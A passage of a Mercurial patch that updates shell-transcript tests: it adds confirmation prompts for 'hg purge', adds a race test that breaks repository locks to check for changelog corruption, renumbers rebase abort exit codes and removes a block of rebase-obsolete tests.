+ + $ hg init empty + $ cd empty + $ hg pull -u ../test + pulling from ../test + requesting all changes + adding changesets + adding manifests + adding file changes + added 1 changesets with 1 changes to 1 files + new changesets 340e38bdcde4 + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved diff --git a/tests/test-purge.t b/tests/test-purge.t --- a/tests/test-purge.t +++ b/tests/test-purge.t @@ -1,8 +1,3 @@ - $ cat <<EOF >> $HGRCPATH - > [extensions] - > purge = - > EOF - init $ hg init t @@ -18,11 +13,35 @@ $ echo 'ignored' > .hgignore $ hg ci -qAmr3 -d'2 0' +purge without the extension + + $ hg st + $ touch foo + $ hg purge + permanently delete 1 unkown files? (yN) n + abort: removal cancelled + [250] + $ hg st + ? foo + $ hg purge --no-confirm + $ hg st + +now enabling the extension + + $ cat <<EOF >> $HGRCPATH + > [extensions] + > purge = + > EOF + delete an empty directory $ mkdir empty_dir $ hg purge -p -v empty_dir + $ hg purge --confirm + permanently delete at least 1 empty directories? (yN) n + abort: removal cancelled + [250] $ hg purge -v removing directory empty_dir $ ls -A @@ -62,6 +81,10 @@ $ hg purge -p untracked_file untracked_file_readonly + $ hg purge --confirm + permanently delete 2 unkown files? (yN) n + abort: removal cancelled + [250] $ hg purge -v removing file untracked_file removing file untracked_file_readonly @@ -121,6 +144,10 @@ $ cd directory $ hg purge -p ../untracked_directory untracked_directory/nested_directory + $ hg purge --confirm + permanently delete 1 unkown files? (yN) n + abort: removal cancelled + [250] $ hg purge -v ../untracked_directory removing directory untracked_directory/nested_directory removing directory untracked_directory @@ -138,6 +165,7 @@ $ touch ignored $ hg purge -p + $ hg purge --confirm $ hg purge -v $ touch untracked_file $ ls @@ -147,6 +175,10 @@ untracked_file $ hg purge -p -i ignored + $ hg purge --confirm -i + permanently delete 1 ignored files? (yN) n + abort: removal cancelled + [250] $ hg purge -v -i removing file ignored $ ls -A @@ -159,6 +191,10 @@ $ hg purge -p --all ignored untracked_file + $ hg purge --confirm --all + permanently delete 1 unkown and 1 ignored files? (yN) n + abort: removal cancelled + [250] $ hg purge -v --all removing file ignored removing file untracked_file diff --git a/tests/test-racy-mutations.t b/tests/test-racy-mutations.t new file mode 100644 --- /dev/null +++ b/tests/test-racy-mutations.t @@ -0,0 +1,102 @@ +#testcases skip-detection fail-if-detected + +Test situations that "should" only be reproducible: +- on networked filesystems, or +- user using `hg debuglocks` to eliminate the lock file, or +- something (that doesn't respect the lock file) writing to the .hg directory +while we're running + + $ hg init a + $ cd a + + $ cat > "$TESTTMP/waitlock_editor.sh" <<EOF + > [ -n "\${WAITLOCK_ANNOUNCE:-}" ] && touch "\${WAITLOCK_ANNOUNCE}" + > f="\${WAITLOCK_FILE}" + > start=\`date +%s\` + > timeout=5 + > while [ \\( ! -f \$f \\) -a \\( ! -L \$f \\) ]; do + > now=\`date +%s\` + > if [ "\`expr \$now - \$start\`" -gt \$timeout ]; then + > echo "timeout: \$f was not created in \$timeout seconds (it is now \$(date +%s))" + > exit 1 + > fi + > sleep 0.1 + > done + > if [ \$# -gt 1 ]; then + > cat "\$@" + > fi + > EOF + $ chmod +x "$TESTTMP/waitlock_editor.sh" + +Things behave differently if we don't already have a 00changelog.i file when +this all starts, so let's make one. + + $ echo r0 > r0 + $ hg commit -qAm 'r0' + +Start an hg commit that will take a while + $ EDITOR_STARTED="$(pwd)/.editor_started" + $ MISCHIEF_MANAGED="$(pwd)/.mischief_managed" + $ JOBS_FINISHED="$(pwd)/.jobs_finished" + +#if fail-if-detected + $ cat >> .hg/hgrc << EOF + > [debug] + > revlog.verifyposition.changelog = fail + > EOF +#endif + + $ echo foo > foo + $ (WAITLOCK_ANNOUNCE="${EDITOR_STARTED}" \ + > WAITLOCK_FILE="${MISCHIEF_MANAGED}" \ + > HGEDITOR="$TESTTMP/waitlock_editor.sh" \ + > hg commit -qAm 'r1 (foo)' --edit foo > .foo_commit_out 2>&1 ; touch "${JOBS_FINISHED}") & + +Wait for the "editor" to actually start + $ WAITLOCK_FILE="${EDITOR_STARTED}" "$TESTTMP/waitlock_editor.sh" + +Break the locks, and make another commit. + $ hg debuglocks -LW + $ echo bar > bar + $ hg commit -qAm 'r2 (bar)' bar + $ hg debugrevlogindex -c + rev linkrev nodeid p1 p2 + 0 0 222799e2f90b 000000000000 000000000000 + 1 1 6f124f6007a0 222799e2f90b 000000000000 + +Awaken the editor from that first commit + $ touch "${MISCHIEF_MANAGED}" +And wait for it to finish + $ WAITLOCK_FILE="${JOBS_FINISHED}" "$TESTTMP/waitlock_editor.sh" + +#if skip-detection +(Ensure there was no output) + $ cat .foo_commit_out +And observe a corrupted repository -- rev 2's linkrev is 1, which should never +happen for the changelog (the linkrev should always refer to itself). + $ hg debugrevlogindex -c + rev linkrev nodeid p1 p2 + 0 0 222799e2f90b 000000000000 000000000000 + 1 1 6f124f6007a0 222799e2f90b 000000000000 + 2 1 ac80e6205bb2 222799e2f90b 000000000000 +#endif + +#if fail-if-detected + $ cat .foo_commit_out + transaction abort! + rollback completed + note: commit message saved in .hg/last-message.txt + note: use 'hg commit --logfile .hg/last-message.txt --edit' to reuse it + abort: 00changelog.i: file cursor at position 249, expected 121 +And no corruption in the changelog. + $ hg debugrevlogindex -c + rev linkrev nodeid p1 p2 + 0 0 222799e2f90b 000000000000 000000000000 + 1 1 6f124f6007a0 222799e2f90b 000000000000 +And, because of transactions, there's none in the manifestlog either. + $ hg debugrevlogindex -m + rev linkrev nodeid p1 p2 + 0 0 7b7020262a56 000000000000 000000000000 + 1 1 ad3fe36d86d9 7b7020262a56 000000000000 +#endif + diff --git a/tests/test-rebase-abort.t b/tests/test-rebase-abort.t --- a/tests/test-rebase-abort.t +++ b/tests/test-rebase-abort.t @@ -95,6 +95,7 @@ ancestor path: common (node de0a666fdd9c1a0b0698b90d85064d8bd34f74b6) other path: common (node 2f6411de53677f6f1048fef5bf888d67a342e0a5) extra: ancestorlinknode = 3163e20567cc93074fbb7a53c8b93312e59dbf2c + extra: merged = yes $ hg resolve -l U common diff --git a/tests/test-rebase-collapse.t b/tests/test-rebase-collapse.t --- a/tests/test-rebase-collapse.t +++ b/tests/test-rebase-collapse.t @@ -134,7 +134,7 @@ $ hg rebase --base B -m 'custom message' abort: message can only be specified with collapse - [255] + [10] $ cat > $TESTTMP/checkeditform.sh <<EOF > env | grep HGEDITFORM @@ -180,7 +180,7 @@ $ hg rebase -s C --dest H --collapse abort: unable to collapse on top of 3, there is more than one external parent: 1, 6 - [255] + [20] Rebase and collapse - E onto H: @@ -386,7 +386,7 @@ BROKEN: should be allowed $ hg rebase --collapse -r 'B+D+F' -d G abort: unable to collapse on top of 2, there is more than one external parent: 3, 5 - [255] + [20] $ cd .. @@ -404,7 +404,7 @@ $ hg rebase --collapse -d H -s 'B+F' abort: unable to collapse on top of 5, there is more than one external parent: 1, 3 - [255] + [20] $ cd .. With internal merge: @@ -484,7 +484,7 @@ $ hg rebase --keepbranches --collapse -s 1 -d 3 abort: cannot collapse multiple named branches - [255] + [10] $ cd .. diff --git a/tests/test-rebase-conflicts.t b/tests/test-rebase-conflicts.t --- a/tests/test-rebase-conflicts.t +++ b/tests/test-rebase-conflicts.t @@ -318,10 +318,10 @@ bundle2-input-part: total payload size 1686 bundle2-input-part: "cache:rev-branch-cache" (advisory) supported bundle2-input-part: total payload size 74 - truncating cache/rbc-revs-v1 to 56 bundle2-input-part: "phase-heads" supported bundle2-input-part: total payload size 24 bundle2-input-bundle: 3 parts total + truncating cache/rbc-revs-v1 to 72 added 2 changesets with 2 changes to 1 files updating the branch cache invalid branch cache (served): tip differs diff --git a/tests/test-rebase-dest.t b/tests/test-rebase-dest.t --- a/tests/test-rebase-dest.t +++ b/tests/test-rebase-dest.t @@ -18,7 +18,7 @@ $ hg rebase abort: you must specify a destination (use: hg rebase -d REV) - [255] + [10] $ hg rebase -d 1 rebasing 2:5db65b93a12b tip "cc" saved backup bundle to $TESTTMP/repo/.hg/strip-backup/5db65b93a12b-4fb789ec-rebase.hg @@ -74,7 +74,7 @@ $ hg pull --rebase abort: rebase destination required by configuration (use hg pull followed by hg rebase -d DEST) - [255] + [10] Setup rebase with multiple destinations @@ -152,7 +152,7 @@ > A D > EOS abort: --collapse does not work with multiple destinations - [255] + [10] Multiple destinations cannot be used with --base: @@ -192,7 +192,7 @@ > Z > EOS abort: rebase destination for f0a671a46792 is not unique - [255] + [10] Destination is an ancestor of source: @@ -204,7 +204,7 @@ > Z > EOS abort: source and destination form a cycle - [255] + [10] BUG: cycles aren't flagged correctly when --dry-run is set: $ rebasewithdag -s B -d 'SRC' --dry-run <<'EOS' @@ -216,7 +216,7 @@ > EOS abort: source and destination form a cycle starting dry-run rebase; repository will not be changed - [255] + [10] Switch roots: @@ -329,7 +329,7 @@ > Z > EOS abort: source and destination form a cycle - [255] + [10] Detect source is ancestor of dest in runtime: @@ -341,7 +341,7 @@ > A > EOS abort: source is ancestor of destination - [255] + [10] "Already rebased" fast path still works: diff --git a/tests/test-rebase-interruptions.t b/tests/test-rebase-interruptions.t --- a/tests/test-rebase-interruptions.t +++ b/tests/test-rebase-interruptions.t @@ -350,7 +350,7 @@ M A rebasing 6:a0b2430ebfb8 tip "F" abort: precommit hook exited with status 1 - [255] + [40] $ hg tglogp @ 7: 401ccec5e39f secret 'C' | @@ -401,7 +401,7 @@ transaction abort! rollback completed abort: pretxncommit hook exited with status 1 - [255] + [40] $ hg tglogp @ 7: 401ccec5e39f secret 'C' | @@ -451,7 +451,7 @@ transaction abort! rollback completed abort: pretxnclose hook exited with status 1 - [255] + [40] $ hg tglogp @ 7: 401ccec5e39f secret 'C' | diff --git a/tests/test-rebase-mq.t b/tests/test-rebase-mq.t --- a/tests/test-rebase-mq.t +++ b/tests/test-rebase-mq.t @@ -46,14 +46,14 @@ $ hg rebase -s 1 -d 3 abort: cannot rebase onto an applied mq patch - [255] + [20] Rebase - same thing, but mq patch is default dest: $ hg up -q 1 $ hg rebase abort: cannot rebase onto an applied mq patch - [255] + [20] $ hg up -q qtip Rebase - generate a conflict: diff --git a/tests/test-rebase-named-branches.t b/tests/test-rebase-named-branches.t --- a/tests/test-rebase-named-branches.t +++ b/tests/test-rebase-named-branches.t @@ -247,7 +247,7 @@ $ hg rebase -s 5 -d 6 abort: source and destination form a cycle - [255] + [10] $ hg rebase -s 6 -d 5 rebasing 6:3944801ae4ea "dev-two named branch" diff --git a/tests/test-rebase-newancestor.t b/tests/test-rebase-newancestor.t --- a/tests/test-rebase-newancestor.t +++ b/tests/test-rebase-newancestor.t @@ -154,7 +154,7 @@ rebasing 2:ec2c14fb2984 "dev: f-dev stuff" rebasing 4:4b019212aaf6 "dev: merge default" abort: rebasing 4:4b019212aaf6 will include unwanted changes from 1:1d1a643d390e - [255] + [10] $ cd .. @@ -314,7 +314,7 @@ rebasing 6:b296604d9846 E "E" rebasing 7:caa9781e507d F tip "F" abort: rebasing 7:caa9781e507d will include unwanted changes from 4:d6003a550c2c or 3:c1e6b162678d - [255] + [10] The warning does not get printed if there is no unwanted change detected: diff --git a/tests/test-rebase-obsolete.t b/tests/test-rebase-obsolete.t --- a/tests/test-rebase-obsolete.t +++ b/tests/test-rebase-obsolete.t @@ -560,7 +560,7 @@ rebasing 2:b18e25de2cf5 D "D" rebasing 6:f15c3adaf214 F tip "F" abort: cannot rebase 6:f15c3adaf214 without moving at least one of its parents - [255] + [10] $ cd .. @@ -743,1398 +743,3 @@ 1 new orphan changesets $ cd .. - -Skip obsolete changeset even with multiple hops ------------------------------------------------ - -setup - - $ hg init obsskip - $ cd obsskip - $ cat << EOF >> .hg/hgrc - > [experimental] - > rebaseskipobsolete = True - > [extensions] - > strip = - > EOF - $ echo A > A - $ hg add A - $ hg commit -m A - $ echo B > B - $ hg add B - $ hg commit -m B0 - $ hg commit --amend -m B1 - $ hg commit --amend -m B2 - $ hg up --hidden 'desc(B0)' - 0 files updated, 0 files merged, 0 files removed, 0 files unresolved - updated to hidden changeset a8b11f55fb19 - (hidden revision 'a8b11f55fb19' was rewritten as: 261e70097290) - $ echo C > C - $ hg add C - $ hg commit -m C - 1 new orphan changesets - $ hg log -G - @ 4:212cb178bcbb C - | - | o 3:261e70097290 B2 - | | - x | 1:a8b11f55fb19 B0 (rewritten using amend as 3:261e70097290) - |/ - o 0:4a2df7238c3b A - - -Rebase finds its way in a chain of marker - - $ hg rebase -d 'desc(B2)' - note: not rebasing 1:a8b11f55fb19 "B0", already in destination as 3:261e70097290 "B2" - rebasing 4:212cb178bcbb tip "C" - -Even when the chain include missing node - - $ hg up --hidden 'desc(B0)' - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - updated to hidden changeset a8b11f55fb19 - (hidden revision 'a8b11f55fb19' was rewritten as: 261e70097290) - $ echo D > D - $ hg add D - $ hg commit -m D - 1 new orphan changesets - $ hg --hidden strip -r 'desc(B1)' - saved backup bundle to $TESTTMP/obsskip/.hg/strip-backup/86f6414ccda7-b1c452ee-backup.hg - 1 new orphan changesets - $ hg log -G - @ 5:1a79b7535141 D - | - | o 4:ff2c4d47b71d C - | | - | o 2:261e70097290 B2 - | | - x | 1:a8b11f55fb19 B0 (rewritten using amend as 2:261e70097290) - |/ - o 0:4a2df7238c3b A - - - $ hg rebase -d 'desc(B2)' - note: not rebasing 1:a8b11f55fb19 "B0", already in destination as 2:261e70097290 "B2" - rebasing 5:1a79b7535141 tip "D" - $ hg up 4 - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "O" > O - $ hg add O - $ hg commit -m O - $ echo "P" > P - $ hg add P - $ hg commit -m P - $ hg log -G - @ 8:8d47583e023f P - | - o 7:360bbaa7d3ce O - | - | o 6:9c48361117de D - | | - o | 4:ff2c4d47b71d C - |/ - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - $ hg debugobsolete `hg log -r 7 -T '{node}\n'` --config experimental.evolution=true - 1 new obsolescence markers - obsoleted 1 changesets - 1 new orphan changesets - $ hg rebase -d 6 -r "4::" - rebasing 4:ff2c4d47b71d "C" - note: not rebasing 7:360bbaa7d3ce "O", it has no successor - rebasing 8:8d47583e023f tip "P" - -If all the changeset to be rebased are obsolete and present in the destination, we -should display a friendly error message - - $ hg log -G - @ 10:121d9e3bc4c6 P - | - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - - $ hg up 9 - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "non-relevant change" > nonrelevant - $ hg add nonrelevant - $ hg commit -m nonrelevant - created new head - $ hg debugobsolete `hg log -r 11 -T '{node}\n'` --config experimental.evolution=true - 1 new obsolescence markers - obsoleted 1 changesets - $ hg log -G - @ 11:f44da1f4954c nonrelevant (pruned) - | - | o 10:121d9e3bc4c6 P - |/ - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - $ hg rebase -r . -d 10 - note: not rebasing 11:f44da1f4954c tip "nonrelevant", it has no successor - -If a rebase is going to create divergence, it should abort - - $ hg log -G - @ 10:121d9e3bc4c6 P - | - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - - $ hg up 9 - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "john" > doe - $ hg add doe - $ hg commit -m "john doe" - created new head - $ hg up 10 - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "foo" > bar - $ hg add bar - $ hg commit --amend -m "10'" - $ hg up 10 --hidden - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - updated to hidden changeset 121d9e3bc4c6 - (hidden revision '121d9e3bc4c6' was rewritten as: 77d874d096a2) - $ echo "bar" > foo - $ hg add foo - $ hg commit -m "bar foo" - 1 new orphan changesets - $ hg log -G - @ 14:73568ab6879d bar foo - | - | o 13:77d874d096a2 10' - | | - | | o 12:3eb461388009 john doe - | |/ - x | 10:121d9e3bc4c6 P (rewritten using amend as 13:77d874d096a2) - |/ - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - - $ hg summary - parent: 14:73568ab6879d tip (orphan) - bar foo - branch: default - commit: (clean) - update: 2 new changesets, 3 branch heads (merge) - phases: 8 draft - orphan: 1 changesets - $ hg rebase -s 10 -d 12 - abort: this rebase will cause divergences from: 121d9e3bc4c6 - (to force the rebase please set experimental.evolution.allowdivergence=True) - [255] - $ hg log -G - @ 14:73568ab6879d bar foo - | - | o 13:77d874d096a2 10' - | | - | | o 12:3eb461388009 john doe - | |/ - x | 10:121d9e3bc4c6 P (rewritten using amend as 13:77d874d096a2) - |/ - o 9:4be60e099a77 C - | - o 6:9c48361117de D - | - o 2:261e70097290 B2 - | - o 0:4a2df7238c3b A - -With experimental.evolution.allowdivergence=True, rebase can create divergence - - $ hg rebase -s 10 -d 12 --config experimental.evolution.allowdivergence=True - rebasing 10:121d9e3bc4c6 "P" - rebasing 14:73568ab6879d tip "bar foo" - 2 new content-divergent changesets - $ hg summary - parent: 16:61bd55f69bc4 tip - bar foo - branch: default - commit: (clean) - update: 1 new changesets, 2 branch heads (merge) - phases: 8 draft - content-divergent: 2 changesets - -rebase --continue + skipped rev because their successors are in destination -we make a change in trunk and work on conflicting changes to make rebase abort. - - $ hg log -G -r 16:: - @ 16:61bd55f69bc4 bar foo - | - ~ - -Create the two changes in trunk - $ printf "a" > willconflict - $ hg add willconflict - $ hg commit -m "willconflict first version" - - $ printf "dummy" > C - $ hg commit -m "dummy change successor" - -Create the changes that we will rebase - $ hg update -C 16 -q - $ printf "b" > willconflict - $ hg add willconflict - $ hg commit -m "willconflict second version" - created new head - $ printf "dummy" > K - $ hg add K - $ hg commit -m "dummy change" - $ printf "dummy" > L - $ hg add L - $ hg commit -m "dummy change" - $ hg debugobsolete `hg log -r ".^" -T '{node}'` `hg log -r 18 -T '{node}'` --config experimental.evolution=true - 1 new obsolescence markers - obsoleted 1 changesets - 1 new orphan changesets - - $ hg log -G -r 16:: - @ 21:7bdc8a87673d dummy change - | - x 20:8b31da3c4919 dummy change (rewritten as 18:601db7a18f51) - | - o 19:b82fb57ea638 willconflict second version - | - | o 18:601db7a18f51 dummy change successor - | | - | o 17:357ddf1602d5 willconflict first version - |/ - o 16:61bd55f69bc4 bar foo - | - ~ - $ hg rebase -r ".^^ + .^ + ." -d 18 - rebasing 19:b82fb57ea638 "willconflict second version" - merging willconflict - warning: conflicts while merging willconflict! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - - $ hg resolve --mark willconflict - (no more unresolved files) - continue: hg rebase --continue - $ hg rebase --continue - rebasing 19:b82fb57ea638 "willconflict second version" - note: not rebasing 20:8b31da3c4919 "dummy change", already in destination as 18:601db7a18f51 "dummy change successor" - rebasing 21:7bdc8a87673d tip "dummy change" - $ cd .. - -Divergence cases due to obsolete changesets -------------------------------------------- - -We should ignore branches with unstable changesets when they are based on an -obsolete changeset which successor is in rebase set. - - $ hg init divergence - $ cd divergence - $ cat >> .hg/hgrc << EOF - > [extensions] - > strip = - > [alias] - > strip = strip --no-backup --quiet - > [templates] - > instabilities = '{rev}:{node|short} {desc|firstline}{if(instabilities," ({instabilities})")}\n' - > EOF - - $ hg debugdrawdag <<EOF - > e f - > | | - > d' d # replace: d -> d' - > \ / - > c - > | - > x b - > \| - > a - > EOF - 1 new orphan changesets - $ hg log -G -r 'a':: - * 7:1143e9adc121 f - | - | o 6:d60ebfa0f1cb e - | | - | o 5:027ad6c5830d d' - | | - x | 4:76be324c128b d (rewritten using replace as 5:027ad6c5830d) - |/ - o 3:a82ac2b38757 c - | - | o 2:630d7c95eff7 x - | | - o | 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - -Changeset d and its descendants are excluded to avoid divergence of d, which -would occur because the successor of d (d') is also in rebaseset. As a -consequence f (descendant of d) is left behind. - - $ hg rebase -b 'e' -d 'x' - rebasing 1:488e1b7e7341 b "b" - rebasing 3:a82ac2b38757 c "c" - rebasing 5:027ad6c5830d d' "d'" - rebasing 6:d60ebfa0f1cb e "e" - note: not rebasing 4:76be324c128b d "d" and its descendants as this would cause divergence - $ hg log -G -r 'a':: - o 11:eb6d63fc4ed5 e - | - o 10:44d8c724a70c d' - | - o 9:d008e6b4d3fd c - | - o 8:67e8f4a16c49 b - | - | * 7:1143e9adc121 f - | | - | | x 6:d60ebfa0f1cb e (rewritten using rebase as 11:eb6d63fc4ed5) - | | | - | | x 5:027ad6c5830d d' (rewritten using rebase as 10:44d8c724a70c) - | | | - | x | 4:76be324c128b d (rewritten using replace as 5:027ad6c5830d) - | |/ - | x 3:a82ac2b38757 c (rewritten using rebase as 9:d008e6b4d3fd) - | | - o | 2:630d7c95eff7 x - | | - | x 1:488e1b7e7341 b (rewritten using rebase as 8:67e8f4a16c49) - |/ - o 0:b173517d0057 a - - $ hg strip -r 8: - $ hg log -G -r 'a':: - * 7:1143e9adc121 f - | - | o 6:d60ebfa0f1cb e - | | - | o 5:027ad6c5830d d' - | | - x | 4:76be324c128b d (rewritten using replace as 5:027ad6c5830d) - |/ - o 3:a82ac2b38757 c - | - | o 2:630d7c95eff7 x - | | - o | 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - -If the rebase set has an obsolete (d) with a successor (d') outside the rebase -set and none in destination, we still get the divergence warning. -By allowing divergence, we can perform the rebase. - - $ hg rebase -r 'c'::'f' -d 'x' - abort: this rebase will cause divergences from: 76be324c128b - (to force the rebase please set experimental.evolution.allowdivergence=True) - [255] - $ hg rebase --config experimental.evolution.allowdivergence=true -r 'c'::'f' -d 'x' - rebasing 3:a82ac2b38757 c "c" - rebasing 4:76be324c128b d "d" - rebasing 7:1143e9adc121 f tip "f" - 1 new orphan changesets - 2 new content-divergent changesets - $ hg log -G -r 'a':: -T instabilities - o 10:e1744ea07510 f - | - * 9:e2b36ea9a0a0 d (content-divergent) - | - o 8:6a0376de376e c - | - | x 7:1143e9adc121 f - | | - | | * 6:d60ebfa0f1cb e (orphan) - | | | - | | * 5:027ad6c5830d d' (orphan content-divergent) - | | | - | x | 4:76be324c128b d - | |/ - | x 3:a82ac2b38757 c - | | - o | 2:630d7c95eff7 x - | | - | o 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - $ hg strip -r 8: - -(Not skipping obsoletes means that divergence is allowed.) - - $ hg rebase --config experimental.rebaseskipobsolete=false -r 'c'::'f' -d 'x' - rebasing 3:a82ac2b38757 c "c" - rebasing 4:76be324c128b d "d" - rebasing 7:1143e9adc121 f tip "f" - 1 new orphan changesets - 2 new content-divergent changesets - - $ hg strip -r 0: - -Similar test on a more complex graph - - $ hg debugdrawdag <<EOF - > g - > | - > f e - > | | - > e' d # replace: e -> e' - > \ / - > c - > | - > x b - > \| - > a - > EOF - 1 new orphan changesets - $ hg log -G -r 'a': - * 8:2876ce66c6eb g - | - | o 7:3ffec603ab53 f - | | - x | 6:e36fae928aec e (rewritten using replace as 5:63324dc512ea) - | | - | o 5:63324dc512ea e' - | | - o | 4:76be324c128b d - |/ - o 3:a82ac2b38757 c - | - | o 2:630d7c95eff7 x - | | - o | 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - $ hg rebase -b 'f' -d 'x' - rebasing 1:488e1b7e7341 b "b" - rebasing 3:a82ac2b38757 c "c" - rebasing 5:63324dc512ea e' "e'" - rebasing 7:3ffec603ab53 f "f" - rebasing 4:76be324c128b d "d" - note: not rebasing 6:e36fae928aec e "e" and its descendants as this would cause divergence - $ hg log -G -r 'a': - o 13:a1707a5b7c2c d - | - | o 12:ef6251596616 f - | | - | o 11:b6f172e64af9 e' - |/ - o 10:d008e6b4d3fd c - | - o 9:67e8f4a16c49 b - | - | * 8:2876ce66c6eb g - | | - | | x 7:3ffec603ab53 f (rewritten using rebase as 12:ef6251596616) - | | | - | x | 6:e36fae928aec e (rewritten using replace as 5:63324dc512ea) - | | | - | | x 5:63324dc512ea e' (rewritten using rebase as 11:b6f172e64af9) - | | | - | x | 4:76be324c128b d (rewritten using rebase as 13:a1707a5b7c2c) - | |/ - | x 3:a82ac2b38757 c (rewritten using rebase as 10:d008e6b4d3fd) - | | - o | 2:630d7c95eff7 x - | | - | x 1:488e1b7e7341 b (rewritten using rebase as 9:67e8f4a16c49) - |/ - o 0:b173517d0057 a - - -issue5782 - $ hg strip -r 0: - $ hg debugdrawdag <<EOF - > d - > | - > c1 c # replace: c -> c1 - > \ / - > b - > | - > a - > EOF - 1 new orphan changesets - $ hg debugobsolete `hg log -T "{node}" --hidden -r 'desc("c1")'` - 1 new obsolescence markers - obsoleted 1 changesets - $ hg log -G -r 'a': --hidden - * 4:76be324c128b d - | - | x 3:ef8a456de8fa c1 (pruned) - | | - x | 2:a82ac2b38757 c (rewritten using replace as 3:ef8a456de8fa) - |/ - o 1:488e1b7e7341 b - | - o 0:b173517d0057 a - - $ hg rebase -d 0 -r 2 - rebasing 2:a82ac2b38757 c "c" - $ hg log -G -r 'a': --hidden - o 5:69ad416a4a26 c - | - | * 4:76be324c128b d - | | - | | x 3:ef8a456de8fa c1 (pruned) - | | | - | x | 2:a82ac2b38757 c (rewritten using replace as 3:ef8a456de8fa rewritten using rebase as 5:69ad416a4a26) - | |/ - | o 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - $ cd .. - -Rebase merge where successor of one parent is equal to destination (issue5198) - - $ hg init p1-succ-is-dest - $ cd p1-succ-is-dest - - $ hg debugdrawdag <<EOF - > F - > /| - > E D B # replace: D -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d B -s D - note: not rebasing 2:b18e25de2cf5 D "D", already in destination as 1:112478962961 B "B" - rebasing 4:66f1a38021c9 F tip "F" - $ hg log -G - o 5:50e9d60b99c6 F - |\ - | | x 4:66f1a38021c9 F (rewritten using rebase as 5:50e9d60b99c6) - | |/| - | o | 3:7fb047a69f22 E - | | | - | | x 2:b18e25de2cf5 D (rewritten using replace as 1:112478962961) - | |/ - o | 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where successor of other parent is equal to destination - - $ hg init p2-succ-is-dest - $ cd p2-succ-is-dest - - $ hg debugdrawdag <<EOF - > F - > /| - > E D B # replace: E -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d B -s E - note: not rebasing 3:7fb047a69f22 E "E", already in destination as 1:112478962961 B "B" - rebasing 4:66f1a38021c9 F tip "F" - $ hg log -G - o 5:aae1787dacee F - |\ - | | x 4:66f1a38021c9 F (rewritten using rebase as 5:aae1787dacee) - | |/| - | | x 3:7fb047a69f22 E (rewritten using replace as 1:112478962961) - | | | - | o | 2:b18e25de2cf5 D - | |/ - o / 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where successor of one parent is ancestor of destination - - $ hg init p1-succ-in-dest - $ cd p1-succ-in-dest - - $ hg debugdrawdag <<EOF - > F C - > /| | - > E D B # replace: D -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d C -s D - note: not rebasing 2:b18e25de2cf5 D "D", already in destination as 1:112478962961 B "B" - rebasing 5:66f1a38021c9 F tip "F" - - $ hg log -G - o 6:0913febf6439 F - |\ - +---x 5:66f1a38021c9 F (rewritten using rebase as 6:0913febf6439) - | | | - | o | 4:26805aba1e60 C - | | | - o | | 3:7fb047a69f22 E - | | | - +---x 2:b18e25de2cf5 D (rewritten using replace as 1:112478962961) - | | - | o 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where successor of other parent is ancestor of destination - - $ hg init p2-succ-in-dest - $ cd p2-succ-in-dest - - $ hg debugdrawdag <<EOF - > F C - > /| | - > E D B # replace: E -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d C -s E - note: not rebasing 3:7fb047a69f22 E "E", already in destination as 1:112478962961 B "B" - rebasing 5:66f1a38021c9 F tip "F" - $ hg log -G - o 6:c6ab0cc6d220 F - |\ - +---x 5:66f1a38021c9 F (rewritten using rebase as 6:c6ab0cc6d220) - | | | - | o | 4:26805aba1e60 C - | | | - | | x 3:7fb047a69f22 E (rewritten using replace as 1:112478962961) - | | | - o---+ 2:b18e25de2cf5 D - / / - o / 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where successor of one parent is ancestor of destination - - $ hg init p1-succ-in-dest-b - $ cd p1-succ-in-dest-b - - $ hg debugdrawdag <<EOF - > F C - > /| | - > E D B # replace: E -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d C -b F - rebasing 2:b18e25de2cf5 D "D" - note: not rebasing 3:7fb047a69f22 E "E", already in destination as 1:112478962961 B "B" - rebasing 5:66f1a38021c9 F tip "F" - note: not rebasing 5:66f1a38021c9 F tip "F", its destination already has all its changes - $ hg log -G - o 6:8f47515dda15 D - | - | x 5:66f1a38021c9 F (pruned using rebase) - | |\ - o | | 4:26805aba1e60 C - | | | - | | x 3:7fb047a69f22 E (rewritten using replace as 1:112478962961) - | | | - | x | 2:b18e25de2cf5 D (rewritten using rebase as 6:8f47515dda15) - | |/ - o / 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where successor of other parent is ancestor of destination - - $ hg init p2-succ-in-dest-b - $ cd p2-succ-in-dest-b - - $ hg debugdrawdag <<EOF - > F C - > /| | - > E D B # replace: D -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d C -b F - note: not rebasing 2:b18e25de2cf5 D "D", already in destination as 1:112478962961 B "B" - rebasing 3:7fb047a69f22 E "E" - rebasing 5:66f1a38021c9 F tip "F" - note: not 